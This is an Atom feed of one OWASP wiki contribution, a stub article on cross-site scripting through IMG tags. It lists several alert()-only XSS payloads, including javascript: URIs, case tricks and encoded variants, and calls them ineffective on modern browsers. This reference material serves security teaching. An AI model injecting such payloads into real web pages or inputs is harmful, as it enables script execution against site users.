<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Paul+McCann</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Paul+McCann"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Paul_McCann"/>
		<updated>2026-04-04T11:37:25Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Script_in_IMG_tags&amp;diff=127286</id>
		<title>Script in IMG tags</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Script_in_IMG_tags&amp;diff=127286"/>
				<updated>2012-04-02T16:05:14Z</updated>
		
		<summary type="html">&lt;p&gt;Paul McCann: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Description==&lt;br /&gt;
It is possible for an attacker to execute Javascript code via the IMG tags.  This is also refered to as XSS (Cross Site Scripting). However, this type of attack is no longer possible on modern browsers.&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('Vulnerable');&amp;quot;&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=`javascript:alert(&amp;quot;RSnake says, &amp;lt;br&amp;gt;&lt;br /&gt;
'XSS'&amp;quot;)`&amp;gt;&amp;lt;br &amp;gt;&lt;br /&gt;
&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;IMG &amp;lt;br&amp;gt;&lt;br /&gt;
SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;IMG &amp;lt;br&amp;gt; SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
[[XSS Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
==Categories==&lt;br /&gt;
&lt;br /&gt;
{{Template:Stub}}&lt;br /&gt;
&lt;br /&gt;
[[Category:Injection Attack]]&lt;/div&gt;</summary>
		<author><name>Paul McCann</name></author>	</entry>

	</feed>